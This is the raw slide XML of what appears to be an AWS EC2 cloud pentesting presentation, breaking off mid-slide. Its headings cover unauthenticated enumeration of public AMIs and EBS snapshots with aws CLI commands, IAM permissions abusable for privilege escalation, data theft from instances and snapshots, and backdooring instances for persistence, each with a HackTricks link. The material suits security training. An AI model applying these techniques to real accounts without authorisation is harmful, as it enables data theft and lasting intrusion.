                <a:latin typeface="Raleway ExtraBold"/>
                <a:ea typeface="Raleway ExtraBold"/>
                <a:cs typeface="Raleway ExtraBold"/>
                <a:sym typeface="Raleway ExtraBold"/>
              </a:rPr>
              <a:t>Unauthenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:latin typeface="Raleway ExtraBold"/>
                <a:ea typeface="Raleway ExtraBold"/>
                <a:cs typeface="Raleway ExtraBold"/>
                <a:sym typeface="Raleway ExtraBold"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p20"/>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50" name="Google Shape;150;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216050" y="780575"/>
            <a:ext cx="8781600" cy="26859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Open ports</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>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SSRF</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Public AMIs</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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aws ec2 describe-images --executable-users all</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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Public EBS Snapshots</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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aws ec2 describe-snapshots --restorable-by-user-ids all</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300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>For more information check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="151"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6.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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p21"/>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57" name="Google Shape;157;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181200" y="695000"/>
            <a:ext cx="8781600" cy="4208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lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>There are tens of different ways to escalate privileges exploiting EC2 &amp; related permissions. There are ways to even escalate privileges locally in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.</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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>EC2 permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>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lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>iam:PassRole, ec2:RunInstances</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2"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Privesc to ECS</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>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lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ec2:ModifyInstanceAttribute</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ec2-instance-connect:SendSSHPublicKey</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>EBS permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>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lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ebs:ListSnapshotBlocks, ebs:GetSnapshotBlock, ec2:DescribeSnapshots</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SSM permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>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lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ssm:SendCommand</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ssm:ListCommands</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ssm:StartSession</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Raleway Medium"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Raleway Medium"/>
                <a:ea typeface="Raleway Medium"/>
                <a:cs typeface="Raleway Medium"/>
                <a:sym typeface="Raleway Medium"/>
              </a:rPr>
              <a:t>Privesc to ECS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Raleway Medium"/>
              <a:ea typeface="Raleway Medium"/>
              <a:cs typeface="Raleway Medium"/>
              <a:sym typeface="Raleway Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>For more information check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-ec2-privesc</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="15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7.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Post Exploitation</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p22"/>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64" name="Google Shape;164;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216050" y="780575"/>
            <a:ext cx="8781600" cy="245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lt2"/>
                </a:solidFill>
                <a:latin typeface="Raleway Medium"/>
                <a:ea typeface="Raleway Medium"/>
                <a:cs typeface="Raleway Medium"/>
                <a:sym typeface="Raleway Medium"/>
              </a:rPr>
              <a:t>Instances and the network are places where a lot of sensitive information is usually stored, processed and sent. Any action that allows you to access this data would be a post exploitation technique:</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Raleway Medium"/>
              <a:ea typeface="Raleway Medium"/>
              <a:cs typeface="Raleway Medium"/>
              <a:sym typeface="Raleway Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Raleway Medium"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Raleway Medium"/>
                <a:ea typeface="Raleway Medium"/>
                <a:cs typeface="Raleway Medium"/>
                <a:sym typeface="Raleway Medium"/>
              </a:rPr>
              <a:t>Malicious VPC Mirror</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Raleway Medium"/>
              <a:ea typeface="Raleway Medium"/>
              <a:cs typeface="Raleway Medium"/>
              <a:sym typeface="Raleway Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Raleway Medium"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Raleway Medium"/>
                <a:ea typeface="Raleway Medium"/>
                <a:cs typeface="Raleway Medium"/>
                <a:sym typeface="Raleway Medium"/>
              </a:rPr>
              <a:t>Steal data from running instance or snapshots</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Raleway Medium"/>
              <a:ea typeface="Raleway Medium"/>
              <a:cs typeface="Raleway Medium"/>
              <a:sym typeface="Raleway Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Raleway Medium"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Raleway Medium"/>
                <a:ea typeface="Raleway Medium"/>
                <a:cs typeface="Raleway Medium"/>
                <a:sym typeface="Raleway Medium"/>
              </a:rPr>
              <a:t>SSM requests steal</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Raleway Medium"/>
              <a:ea typeface="Raleway Medium"/>
              <a:cs typeface="Raleway Medium"/>
              <a:sym typeface="Raleway Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Raleway Medium"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Raleway Medium"/>
                <a:ea typeface="Raleway Medium"/>
                <a:cs typeface="Raleway Medium"/>
                <a:sym typeface="Raleway Medium"/>
              </a:rPr>
              <a:t>Privesc to ECS</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Raleway Medium"/>
              <a:ea typeface="Raleway Medium"/>
              <a:cs typeface="Raleway Medium"/>
              <a:sym typeface="Raleway Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Raleway Medium"/>
              <a:ea typeface="Raleway Medium"/>
              <a:cs typeface="Raleway Medium"/>
              <a:sym typeface="Raleway Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Raleway Medium"/>
                <a:ea typeface="Raleway Medium"/>
                <a:cs typeface="Raleway Medium"/>
                <a:sym typeface="Raleway Medium"/>
              </a:rPr>
              <a:t>For more information check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Raleway Medium"/>
                <a:ea typeface="Raleway Medium"/>
                <a:cs typeface="Raleway Medium"/>
                <a:sym typeface="Raleway Medium"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Raleway Medium"/>
              <a:ea typeface="Raleway Medium"/>
              <a:cs typeface="Raleway Medium"/>
              <a:sym typeface="Raleway Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="165"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8.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Persistence</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p23"/>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71" name="Google Shape;171;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216050" y="780575"/>
            <a:ext cx="8781600" cy="245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lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Anyway,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> to keep access to the IAM roles, instances or network would be a persistence technique:</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Security Group Connection Tracking Persistence</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EC2 Lifecycle Manager</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Backdoor Instances</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VPN / VPC Peering</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300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>For more information check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
